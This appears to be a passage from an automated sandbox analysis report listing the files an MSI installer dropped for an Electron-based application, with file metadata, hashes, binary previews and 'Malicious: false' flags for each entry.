Preview:	........w#\.e.L...h.T...i.e...j.q...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}. .....(.....-.....5.....=.....E.....L.....S.....Z.....[.....\.....^.........................................3.....g.....+...........8.....[.....V.....!.......................b.......................>.................=.............................w.............................R...........X...........W...........<...........5.....Z.....@...........w......................./.....k...........k.................W.................'...........$.....\.....{.....?...........@.....k.........................................f........... .............................3.................p.....!.................Z.................+...........:.....s...........Z...........9.....V.....&.................q...........z.................. ....,!.....!.....!.....".....#.....#.....#.....$....{%.....&..../&.....'.....'....6(.....(....:).....).........:.....*....5+....m+.....+....[,.....-....p-

C:\Users\user\AppData\Local\Programs\Setup\locales\sv.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	465621
Entropy (8bit):	5.545518715933861
Encrypted:	false
SSDEEP:	6144:kcCDD/pC1z11OBIrkn554FwxZf1Chn4RFcmi8G96iMXSOwDE/xWcqVR5sW7Y5FcJ:vecXwIrLFy+5E5FcJ
MD5:	E4C9CED1A36EA7B71634E4DF9618804F
SHA1:	C966C8EB9763A9147854989EA443C6BE0634DB27
SHA-256:	E5CCCDB241938F4A6B9AF5A245ABE0E0218C72E08A73DB3ED0452C6DDFB9C379
SHA-512:	D07A4D62F22A1830D3EC44F0C347E4A7D70B35CEBA126CBDC246A7B3EE7EDA85E2338BAB3EDC7223F579964868136BB10D42C05E0E0FF9F73447B3606D9B2C4E
Malicious:	false
Preview:	........?#..e.....h.....i.....j.....k.....l.....n.#...o.(...p.5...q.;...r.G...s.X...t.a...v.v...w.....y.....z.....\|.....}.....................................................................................%.....9...........>.......................p.................A.................'.................0.....L.................1.....A.................2.....B...........&....._.................m.................+.......................5.......................s...........;.....Q...........\|.................J.......................&.....}.......................[.......................`.......................d.......................V.......................F.....q.................D.....v.................X.......................S.....s.................).....G....._.......................-.................B.....r...........&.....E.....[.................?.....T.................H.....^...........b.................M.........................................*.....t.......................L.............

C:\Users\user\AppData\Local\Programs\Setup\locales\sw.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	490754
Entropy (8bit):	5.340013612557628
Encrypted:	false
SSDEEP:	12288:/wmIzbIcvt54uCERdyU7bQg8Wo97pJ8zvgu352ub95Z4sKPe/BrufA:/azl5Bn
MD5:	59FF4E16B640EF41100243857EFDD009
SHA1:	F712B2D39618FFADCF68D1F2AB5A76DA5BE14D74
SHA-256:	C18A209F8EC3641C90EA8CED5343F943F034E09C8E75466E24DCABC070D08804
SHA-512:	0E721A6CBF209AC35272AD292B2E5000D4E690062DDB498DBF6E8E6EE5F6E86D034A7303A46C2B85750245381C78EFAFC416EAD13C1FE0EE5EC6088DD66ADCA2
Malicious:	false
Preview:	........k#h.e.4...h.<...i.G...j.S...k.b...l.m...n.u...o.z...p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}...............................'...........5.....<.....=.....>.....C.....U.....e.....y...................................e...................................\.....r...........&.....Y.....m.................B.....Q.................+.....9.................:.....`...........^.................5.......................C.......................D...................................Z.....v........... .....H.....c.............................j.......................\.................%.....}.......................~.................(.....\|.......................h...................................2.....K.................*.....F.................9.....Z.................V.....f...........B.......................^.......................@.....h.....z...........V.................@.................).................N.....k...........`.................&.....z.................H.............

C:\Users\user\AppData\Local\Programs\Setup\locales\ta.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1268483
Entropy (8bit):	4.035580260221202
Encrypted:	false
SSDEEP:	6144:GeTVtPcVpmT9Yvh54P5TzotR1cA25tm1vYpiMyy:nViVITqzy5TzccA25tm1vYpiMyy
MD5:	5F80C9DA0C09491C70123581A41F6DAD
SHA1:	3FC9560A954271CF09AAA54EEC34963C72C06E85
SHA-256:	30658D99D753946E9C9C02094C89BE25B710DB77251DF6CD1A8839C29DE5F884
SHA-512:	072C5DB7FE1EB9E6C270D0E9B439CF84EBB3DC374D4F01F01F9341030883F2D6D9C6970FB6EF14BF96FCCB51EADE9CA762F396F89BA1D3DF1230DDA68557FD4A
Malicious:	false
Preview:	........N#..e.....h.....i.....j.....k.....l.9...n.A...o.F...p.S...q.Y...r.e...s.v...t.....v.....w.....y.....z.....\|.....}.........................................................................=.....k.........................................H...........2.....o...........T.....,.....g.........................................!.....U.....<...................................s...........?.....~.....G.........................................5.................c.......................i.........................................].....?.............................p............ ....6!....@".....".....#.....$.....%.....%.....%.....&.....'.....(....3(....,)...............*.....+.....,....,-....`-...........0.....0....,1....'2.....3.....3.....3.....4....p5.....5.....6.....6.....7.....8.....8.....:....%;.....;....-<.....=.....=.....>....d>.....?.....@....-A.....A.....B.....D.....D....BE.....G.....I.....J.....J.....L....#M.....M....MN.....O.....P.....Q.....Q.....R.....S....^T.....T.....U.....W.....W

C:\Users\user\AppData\Local\Programs\Setup\locales\te.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1173901
Entropy (8bit):	4.287514680628642
Encrypted:	false
SSDEEP:	12288:/jAoZvA07McKNnCRWtgd49+agb0DQWp5B63p1Fm6OiTlC2pFg+NFqUZrOIoXAoIm:s5G35xM/1
MD5:	17B858CF23A206B5822F8B839D7C1EA3
SHA1:	115220668F153B36254951E9AA4EF0AA2BE1FFC4
SHA-256:	D6180484B51AACBF59419E3A9B475A4419FB7D195AEA7C3D58339F0F072C1457
SHA-512:	7B919A5B451EC2BA15D377E4A3A6F99D63268E9BE2865D674505584EED4FA190EAAE589C9592276B996B7CE2FDFAE80FDA20FEFF9EA9ADBB586308DFD7F12C2A
Malicious:	false
Preview:	.........#N.e.h...h.p...i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.-...\|.3...}.E.....M.....R.....Z.....b.....j.....q.....x..................................................... .....h.....R...................................U.....p.....<.........................................T............................./.....g...........W.........................................:.......................A.....8.................v.......................V.........................................".....K...........{.............................A...... ....\|!....."....e".....#....n$.....$....5%....U&....&'.....'.....'.....(.....)....C..........+....~,.....,....<-.........../....(0....g0....h1.....2....x2.....2.....3.....4....Z4.....4....Q5.....6.....6.....6....^8....[9.....9.....:.....;....8<.....<.....<.... >.....>.....?.....?.....A.....A....yB.....B.....D.....F....GG.....G.....I.....J.....J....FK.....L.....M.....N....eN....lO....4P.....P.....P....6R....1S.....S

C:\Users\user\AppData\Local\Programs\Setup\locales\th.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	987501
Entropy (8bit):	4.326923937635645
Encrypted:	false
SSDEEP:	12288:OgFN2HN9LyZYA1T6z1L/LLftDjsAnILwgv1V5UBGsL3fBj8BlzEdq3Ro9lGdI9uN:OgFYdK5J5j
MD5:	4917873D8118906BDC08F31AFB1EA078
SHA1:	49440A3B156D7703533367F8F13F66EC166DB6E9
SHA-256:	D051B400096922089F6DAA723FAC18C9640BA203B2879AAC4CA89B05738DD32D
SHA-512:	30E6446BAD54B86BE553FA293C7A92EC221ADB54B99624ED69702DF75347A98697158041A45F77ECE4E7ED0FDA41306EF21EB27981F24F0A4E42E8306175A88E
Malicious:	false
Preview:	........."/.e.....h.....i.....j.....k.....l.....o.....p.....q.....r.....s.....t.....v.,...w.9...y.?...z.N...\|.T...}.f.....n.....s.....{.......................................................................Y.......................<.....{.....C...........D.....n...........Q...........'.....`.....;.......................P.................Y...........".....;.....^.........................................[.....)...........T.....x.....C...........P.....w.....K...........d.......................k.................#.....{...............................................w...........p..... .......................@.......................Q.......................6.......................1.....................................................Z...........H ..... .....!....J!.....!....X".....".....".....$.....$....^%.....%.....&.....&....&'....V'....+(.....(.....)....J)....I.........M+.....+.....,....t-..........=....../.....0....A1.....1.....2....L3.....3.....3.....4....D5.....5.....5.....6.....7...."8

C:\Users\user\AppData\Local\Programs\Setup\locales\tr.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	501122
Entropy (8bit):	5.618531845968946
Encrypted:	false
SSDEEP:	6144:tgGjoIj9GAb0GKPRquxFX7gFZ7yMqPO4ppXHG42ge+54n/R+Pi1c2vdTAMTw/KUX:tgGHgo0G0RqU8wZHGe54n/C
MD5:	55E06CD9356D0FB6F99932C2913AFC92
SHA1:	AA5C532DDB3F80D2F180AD62CE38351E519A5E45
SHA-256:	AFCBF02420DC724059F70D1DC6FFA51F5DD75136D9E1E8671D92D5D14955EDF9
SHA-512:	813C180CB1AA205034497BE5FC8A631FF117E5ED17CDF0AC59B7569D74D849B385852A15BBADD3146F942C58BAB80D94BF0980D13CA4B4424D1CB1DF0CB1A2CD
Malicious:	false
Preview:	.........#1.e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.%...v.:...w.G...y.M...z.\...\|.b...}.t.....\|...............................................................................................2.......................v.................K.................!.......................0.............................o.......................y.................(.................^.....{...........@.....r.................7.....a.....q...........].................7.......................o.......................o.......................l.......................l.........................................,.......................,.......................$.......................*.........../.....}.................\.......................O.....q.................6.....n.................W.......................`.......................S.....~.................g.................n.......................(...................................T.....p...........4.....d.....y...........R.......

C:\Users\user\AppData\Local\Programs\Setup\locales\uk.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	856077
Entropy (8bit):	4.859457960004309
Encrypted:	false
SSDEEP:	12288:8Jzdfzlw5Cgnbz/T0hoaiJITt5eB3IjeAjmEFIOuHLNiXEqqbo3/d:KdfhAw56EL
MD5:	381CB33C2D4FD0225C5C14447E6A84E0
SHA1:	686B888228F6DD95ADE94FEE62EB1D75F3E0FC93
SHA-256:	C2A6B16ABEAB6E18276BC1636555E93218763B9C99CACD0B42481B35E3A11820
SHA-512:	F7A2828AA4CD85F07A5D66832F247F70951ABF34F81A282DC41EC51875BA70D940353D010B605C56CC59BEE47309AA311099D4E6EBD17F3C1538521D0CDDF4B6
Malicious:	false
Preview:	........%#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.$...t.-...v.B...w.O...y.U...z.d...\|.j...}.\|........................................................................................._.....C.......................^...........d...........Y.............................(.................s...........Z.........................................h.............................).....e.......................7...........v.......................c.............................:.....t...........m.................^.................;...........:.....x...........J...........H.....o.........................................T.....m...........\|.................p...........>.....Y.....R.....".............................C.....e...........;.....d...........7...........V.....q.....f...................................>.....k........................ ..... ...._!.....!.....".....".....#....j$.....$....y%....=&.....&.....'.....'....F(.....(.....(....G).....)......... .....*.....+.....,

C:\Users\user\AppData\Local\Programs\Setup\locales\ur.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	749985
Entropy (8bit):	5.130337183789155
Encrypted:	false
SSDEEP:	12288:W2U9cmoa5DD8P4WrDD6yACLUj5DDPEFYW7BYcQYriwadcJKwUxuvco/9NjjFpvxR:1a8G5bWp
MD5:	861FFD74AE5B392D578B3F3004C94CE3
SHA1:	8A4A05317A0F11D9D216B3E53E58475C301D7EA5
SHA-256:	B9F22A23368BF1E21F3085583ECB775CCE8045176721FF6AE798B06BD2810DBC
SHA-512:	52EDE35B7ED1FB6E51B18E450B95C3245D326F2AFDA646E3642EE68B714DCF9A726AFE32E2759E9EA87A104F4A59E6FC2C60B3275AAD8332AE1C626231E6747B
Malicious:	false
Preview:	........e#n.e.(...h.0...i.8...j.D...k.S...l.^...n.f...o.k...p.x...q.~...r.....s.....t.....v.....w.....y.....z.....\|.....}...........................................&.....-.........../.....4.....L.....f.................\|.....>.......................T.......................z.....................................................j...............................................X...........N...........K...........,.................;...............................................5.................j.................{.................^..................................R.....l.........................................t...............................................I.....\...........g.......................C.............................@.....p...........Q.....~...........9.............................s.............................X.....{.....)............................z...........'............ .....!....T!....6"....."....`#.....#....j$.....%....g%.....%....-&.....&.....&.....'.....'....J(.....(

C:\Users\user\AppData\Local\Programs\Setup\locales\vi.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	592944
Entropy (8bit):	5.79362677638915
Encrypted:	false
SSDEEP:	12288:9t12XV1+crwJ2roEw/aBuIZgsHXW0YYEDOr9g/C508jUmBnAi9wziMHQmwtm4:L12XX+crwJ2iaLZgsHG0Y3C508ImCi9v
MD5:	4076D3C0C0E5F31CF883198C980D1727
SHA1:	DB51B746216EA68803C98D7C1A5A2B45944359F3
SHA-256:	F1458C4CE4CA708E849EB0C68A5157360EF003F3A9C95628D5CA12ADA303B379
SHA-512:	80E4E960218F7D84423124C34352251411BAF008E821A344A0B6C2E7F1483694010F28B7DE21C7E2C69ABB4EC92E0D9CBDDEED6279B90C47245F4CBC500CDB77
Malicious:	false
Preview:	.........#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.1...w.>...y.D...z.S...\|.Y...}.k.....s.....x.........................................................................................r.............................j...........3...........'.....M...........N.......................b.......................j.................U.................Q.................#.....Q...........b.................R.............................^.......................,.................0.......................J.......................e................."........... .....h.................U.......................g.......................t.................'.............................2.................7.......................y...................................N.......................B...........&.....[.....}...........z.................q...........'.....N...................................\|.............................6.....O...........".....U.....i.........................

C:\Users\user\AppData\Local\Programs\Setup\locales\zh-CN.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	428244
Entropy (8bit):	6.66612560644761
Encrypted:	false
SSDEEP:	6144:rnmNoByFw9qnvdNzuIaG/7C5ccJu7kzDg5CJTNY6BoHHulW:r2oBew9qvfz/aJ5ccJuAg50TNY6BoT
MD5:	3210460A24F2E2A2EDD15D6F43ABBE5F
SHA1:	608FF156286708ED94B7AE90C73568D6042E2DBD
SHA-256:	0F8D42D7F0B0B01AAFAD6AE79F0BD0CA518B2DB94287B09DF088BC093F15F605
SHA-512:	F97427DBA4217E01A7ED395C453D03DDA4F2258CBA589258DA0EACFDE427BF442CDDEF541A23E7782914433E70A9623E904A5070DEBA9F9D50DDA20732EB5E86
Malicious:	false
Preview:	........."..e.2...h.:...i.B...j.E...k.T...l.[...m.c...o.i...p.n...q.t...r.....s.....t.....v.....w.....\|.....}.......................................................!.....#.....(.....1.....=.....O.....a...........T.......................g.......................n.......................w.......................v.......................A.....h.....u...........".....H.....b...........=.....~.................L.......................2.....[.....g.................M....._...........4.....r.......................-.....G.............................V.......................3.......................;.............................s.......................Q.....y.................*.....S....._...........E.......................5.....U.....i.................6.....M.................(.....:.......................;.............................W.......................W.......................s...........,.....>.................B.....W.................-.....<.............................Z.......................V.

C:\Users\user\AppData\Local\Programs\Setup\locales\zh-TW.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	424179
Entropy (8bit):	6.677156018886683
Encrypted:	false
SSDEEP:	6144:svATQ4LawqVPkG49+J+k2i2iurW4hcv50Ynzq1TfAyn7zeGTs:sY/2mG4+CW4hcv50YnzeNn7I
MD5:	F466116C7CE4962FE674383D543C87F6
SHA1:	F65BF0DC1F1B15C132674FB8FF540F7D2AFE1D6E
SHA-256:	FF3A294FD1AFB1FA7AAF53FBC4396643A12ED132633C5C86F14C16B88FA94A7B
SHA-512:	4851A08069FCAC75E4051E53D4526789BFE6C393AB963E8263803BBF6E96CB150E9BA741650EFB5EE500E8A757D8512EB17DC268CEC1AB6FD3ACFAC62F7DA27D
Malicious:	false
Preview:	........."..e.....h.....i.....j.....k. ...l.+...n.3...o.8...p.@...q.F...r.R...s.c...t.l...v.....w.....y.....z.....\|.....}...............................................................................'.................U.....g.................8.....D.................6.....H.................%.....7.............................`.......................<.......................0.......................(.............................e.......................`...............................................[.....o.......................9.....E.............................i.......................F.......................).............................e.......................>.....g.....s...........;.....p.......................0.....D.......................^.......................J.......................3.....s.......................=.....`.....r...........%.....T.....n...........Z........................................./.............................:.....O.....\.................-.....?.............

C:\Users\user\AppData\Local\Programs\Setup\resources.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	5483537
Entropy (8bit):	7.995680005569416
Encrypted:	true
SSDEEP:	98304:+APFNXMmWPVctFCZcSENQjxh1Z/p6uNXrwrXRVunEVvXjAfz3hIkrT7s:+APFNXMddCM0Ghz/xpkrX2nEVvXGqkXA
MD5:	E2088909E43552AD3E9CCE053740185D
SHA1:	24B23DD4CAD49340D88B9CB34E54C3CA0EB0D27F
SHA-256:	BBA36D4D18D64D9627F54C54FD645C5BA459D25A59ACC5228210BD707AEF67FD
SHA-512:	DCEFACDDEC38D8941C7D2D7B971B6F22DD0ACB4116E48891D1D48A4D88968DA12B152CCB7591715C88F8E14C315E235D1C4E6852CC38B9246091C50226900DE6
Malicious:	false
Preview:	........@...f.....{.2..\|..-..~..0.....C....;E....iF....rQ......................+.................V...........q...........L.....l.....J..........<.....<.....<.....<c....<.....<"....</....<.....<.....<`3...<V:...<a>...<.>..I=.>..J=.C..K=.D..R=XI..S=.S..T=.a..[=s...\="...]=....^=...._=...`=(...a=....b=<...c=...e=r...f=.....=.....=.....=.....=.....=.....=4....=3....=7....=.....=.....E....+E....,E@...-E.....E. ../E.+..8E.<..9E.N..:E.`..BJ.l..CJ)y..DJ=...EJ...FJ....GJ\...HJr...IJ....JJ...KJZ...LJ....(K...)K....J[...K[....L[.)..M[.+..N[G-..O[.0..P[.2..Q[.5...[.D...[.I...[.N...[o]...[d`...[.e...[.f...[Ah...\.i...\.r...\!x...\.~...\y....\....\8....\....\.....\....\Z....\.....\.....\!....\,....\.....\.....\.\|...\........................>.....t...........t.....e...........1..........G.....M...........?...........n...........".........9.........b.........y.........<.....u.......7..........O....................o.........................a...........-.....1.....y.

C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	18720228
Entropy (8bit):	6.640044280069575
Encrypted:	false
SSDEEP:	98304:6gUdmDsWfYkfO8JXZzHuW5qqx8hi9tH4X3inMZtfzDQBx:6gUdmDsWQkfOOXsW59ehi9tHHwtfHQBx
MD5:	FFB6BBA3B749C2CE73291D2CF9D2231F
SHA1:	DFE6958DAA04F83E9CEB213A506696CA3D5B2314
SHA-256:	AE5640A1F219FB545461A820605E8B1E1394F0AFB452935162E826CAE6729E74
SHA-512:	15432BE55AFA42AC0C0DCE7208550A17889843C9A716ABA66D4B73E650CF287E985C0BE6B5E9A1C6EDAD088F3EB26BCD945FFE5FD289F521FF1A81A1168F5FA3
Malicious:	false
Preview:	.....^...^...^..{"files":{"node_modules":{"files":{"call-bind":{"files":{".eslintignore":{"size":10,"integrity":{"algorithm":"SHA256","hash":"5c5daf48fdf4db42e16c29b5b3de54984bafe0c2ff367a186ca97f1d4ed48290","blockSize":4194304,"blocks":["5c5daf48fdf4db42e16c29b5b3de54984bafe0c2ff367a186ca97f1d4ed48290"]},"offset":"5484895"},".nycrc":{"size":139,"integrity":{"algorithm":"SHA256","hash":"997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a","blockSize":4194304,"blocks":["997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a"]},"offset":"5484905"},"LICENSE":{"size":1071,"integrity":{"algorithm":"SHA256","hash":"39c5ec504cf6bd5cd782a7c695828e09189df79f5d94840e4f08feb97b9fd416","blockSize":4194304,"blocks":["39c5ec504cf6bd5cd782a7c695828e09189df79f5d94840e4f08feb97b9fd416"]},"offset":"5485044"},"callBound.js":{"size":413,"integrity":{"algorithm":"SHA256","hash":"2b2fce7622fdd680256d28bcd59c30913546a825bf69d754d21a1d21ccc2928c","blockSize":4194304,"blocks":["2b2fce762

C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txt

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2068
Entropy (8bit):	5.069793714252897
Encrypted:	false
SSDEEP:	24:xdI5XxNvisJtb8yxRBkfh4E6dwpoXT8+bSOavNO27NOHjoJOI4spo+kpRiYTRHX:jOhNvierxRBkfWipoXTStJ60usi+k+gX
MD5:	7DD3BDF130A37BCD5E7DE4CF642150E1
SHA1:	9CBF17699F354BA7213202E5510C770DE077BA49
SHA-256:	34CCBDFCBB0B54AE4DB54D50D12C0B923AB1B8F485FF93C9C2F64FE3FB574F12
SHA-512:	35761D3536B6441DAB32E6394880915239A862E2E98C60E88A261887438BC308652776EB507775CF93D4B45050AC1CDE2E5CCF2088F494EA2AACE88F3A48DB1A
Malicious:	false
Preview:	.Shortcut [Version 1.11]..Creates, modifies or queries Windows shell links (shortcuts)...The syntax of this command is:..Shortcut.exe /F:filename /A:C\|E\|Q [/T:target] [/P:parameters] [/W:workingdir]. [/R:runstyle] [/I:icon,index] [/H:hotkey] [/D:description].. /F:filename : Specifies the .LNK shortcut file.. /A:action : Defines the action to take (C=Create, E=Edit or Q=Query).. /T:target : Defines the target path and file name the shortcut points to.. /P:parameters : Defines the command-line parameters to pass to the target.. /W:working dir : Defines the working directory the target starts with.. /R:run style : Defines the window state (1=Normal, 3=Max, 7=Min).. /I:icon,index : Defines the icon and optional index (file.exe or file.exe,0).. /H:hotkey : Defines the hotkey, a numeric value of the keyboard shortcut.. /D:description : Defines the description (or comment) for the shortcut... Notes:. - Any argument that contains spaces must be enclosed in "double

C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	4.777530479814042
Encrypted:	false
SSDEEP:	768:p8AcstBy9afhyO45SqNf/mmjVrqvn84Bhbrqtuv:p5csny9TVheqhQn8Igt+
MD5:	59375510BDE2FF0DBA7A8197AD9F12BB
SHA1:	B7AEF73FD5C9610860E2F3F6A3B8A21CB6873261
SHA-256:	74CD07EF186D995AD75A0C2A153D1DD6F7B563987F5AA0FEFEF0A095708C02DD
SHA-512:	EAA013B4885A4F05E998366317FE5BC46B7057C1F29653004787B0A6C40B445728A8EC63D0FA577E56293C34A27B508B7CC17A7A6AC95DE3C42541A51ECD12CC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.=...S...S...S..]...S.".Y.'.S.......S.......S...R.".S.".X...S...U...S.Rich..S.........................PE..L...y;.B.................p..........k-............@.........................................................................x...P....................................................................................................................text...(i.......p.................. ..`.rdata..n...........................@..@.data....T.......@..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\windows-shortcuts.js

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	5.188773568132433
Encrypted:	false
SSDEEP:	96:9TZeep5yuqi1CMzUucscpvqZMhhqYouHmGSGAs4BNOpAwSqjcOaUYR2INdIvcEW/:9TZePGCMzUlHpCuSSHmGFA7BUpAKjcYM
MD5:	6A189C41A3363A8AE600243C952EDB05
SHA1:	15980EBB621ED3936B2BCCDF7F2C3294D57219E5
SHA-256:	ACC3C7E29780AEE7923B101855E25BD53CF6081F7553720F9DCEFE6116EF891C
SHA-512:	B18297C5E83B22ABB022DDD7622F187BDDEFB7D3E4ECBA0D7FDB65D7926FE0F8107F1DC82005EE4AF9B41C2993888576D60A637AD141F0C7A9BC75DCC00B16D8
Malicious:	false
Preview:	var execFile = require('child_process').execFile;.var pathUtils = require('path');../. options object (also passed by query()). * target : The path the shortcut points to. * args : The arguments passed to the target as a string. * workingDir : The working directory of the target. * runStyle : State to open the window in: ws.NORMAL (1), ws.MAX (3), or ws.MIN (7). * icon : The path to the shortcut icon file. * iconIndex : An optional index for the image in the icon file. * hotkey : A numerical hotkey. * desc : A description. */..function parseQuery(stdout) {..// Parses the stdout of a shortcut.exe query into a JS object..var result = {};..result.expanded = {};..stdout.split(/[\r\n]+/)....filter(function(line) { return line.indexOf('=') !== -1; })....forEach(function(line) {.....var pair = line.split('=', 2),.....key = pair[0],.....value = pair[1];.....if (key === "TargetPath")......result.target = value;.....else if (key === "TargetPathExpanded")......result.expanded.target = value;..

C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\package.json

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	577
Entropy (8bit):	4.877056753350964
Encrypted:	false
SSDEEP:	12:y1CBJ+rLgoPF8i81mbmF2P9nEP7oh1uj7HxY:y1CBJ0cG127oh0q
MD5:	D35A29EB509D52F43AD8D7D7E57557CA
SHA1:	73E4A065CFCA688E7F6813AF77BBD5DDB63F7148
SHA-256:	540B79DE6A1C3583C8255B304849701744A9A640FA45F10B64EC983BE7BD408A
SHA-512:	B722F588A5E49EB787D0F9AC266F50BACCF5FD3BD9F3023DC70833FB68F84605571FBAF8C459BFDE902C98F4572132FB8590EE03548ED6FD5F53DE5D30D5A90C
Malicious:	false
Preview:	{. "name": "windows-shortcuts",. "version": "0.1.6",. "description": "Create, edit, and query Windows shortcuts (.lnk files)",. "license": "MIT",. "author": "j201 <j201.alex@gmail.com> (http://j201.github.io)",. "main": "./lib/windows-shortcuts",. "typings": "./lib/windows-shortcuts.d.ts",. "repository": {. "type": "git",. "url": "git://github.com/j201/windows-shortcuts.git". },. "homepage": "http://github.com/j201/windows-shortcuts",. "devDependencies": {. "signal-exit": "^2.1.2",. "tape": "^4.4.0",. "tmp": "0.0.28",. "touch": "^1.0.0". }.}

C:\Users\user\AppData\Local\Programs\Setup\snapshot_blob.bin

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	267462
Entropy (8bit):	4.19770221494855
Encrypted:	false
SSDEEP:	3072:8LuAqiYp4bhaz8Le7ICHKhsqdzoGq/p2Vy:hiHbhaMAIyAsqxip2Q
MD5:	6FCB8A6C21A7E76A7BE2DC237B64916F
SHA1:	893EF10567F7705144F407A6493A96AB341C7CCF
SHA-256:	2BCEEF4822CA7CC3ADD4A9DCB67C51EFB51C656FCE96A3B840250DE15379959C
SHA-512:	3B745740BBBE339542EF03FD15DD631FB775E6BF8CA54D6D2B9CEAD3AA5AAFC4CAB49E507BC93641E581412BBEB916A53608D5F5D971EA453779E72D2294DAFB
Malicious:	false
Preview:	........a...1.Nk11.8.172.18-electron.0...........................................@..fT...l...........?..a........a........a........ar.......a8.......a............e....f...bf....f..."g....g....g...Bh....h....i...bi....i..."j..(Jb...)L.....@..F^.1..5.`.....(Jb...-P.....@..F^..`.....H...IDa........Db............D`.....-.D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.......................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Programs\Setup\v8_context_snapshot.bin

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	626313
Entropy (8bit):	5.180772010538009
Encrypted:	false
SSDEEP:	6144:jMWiyz4J+1OFZAsXbJ8qPOzhXvKwvrBTbvUyMR/GLrOp:j2+lOF4h/DvNHvUiap
MD5:	1A37F6614FF8799B1C063BC83C157CC3
SHA1:	8238B9295E1DDE9DE0D6FD20578E82703131A228
SHA-256:	4FBE07F71B706C2A2948EBA9A6B1979E23C83342B190723A6EC5251B2D6DAD7C
SHA-512:	6677F65A0E26FDC2CFF6CEF0231F5E5F0713EE7C5CF7F488599A3C7AC3E8365AFAEC10B35D6145EA58D364151D8BCB08308765693A9797EA99B894D6E8224AC7
Malicious:	false
Preview:	..........N5<Dk11.8.172.18-electron.0..............................................1....8.......E..........0...a........a........aT.......ar.......a8.......a............e....f...bf....f..."g....g....g...Bh....h....i...bi....i..."j..(Jb...)L.....@..F^.1..5.`.....(Jb...-P.....@..F^..`.....H...IDa........Db............D`.....-.D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L...............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Programs\Setup\vk_swiftshader.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5180416
Entropy (8bit):	6.360585559792186
Encrypted:	false
SSDEEP:	49152:56h3a0f1ABi1jP9LoS8lne0Zv8EgHI7JXYN3bgFNmEgMYmz2qA0Mr7wsVUsNCOzZ:sh3aMXoSHfPwksHldLiuNr
MD5:	F16C36AE369609497BFD0847889BEC63
SHA1:	5DCA218BF0B2A20D7D027FA10FDB1B8152564FE4
SHA-256:	4488A958418227FBE6F64898C2F85EEFD87FC9E46AEA457233B38DB8A86E944D
SHA-512:	9F06F4A318C8A3E2FDCCB6D983087184CFF37A2B79E0C1E85B3AC8E45695454C4AACB4468593EBBFFF64739B0D598BA4D1D9DD94187B1BBD82C1369C62781109
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
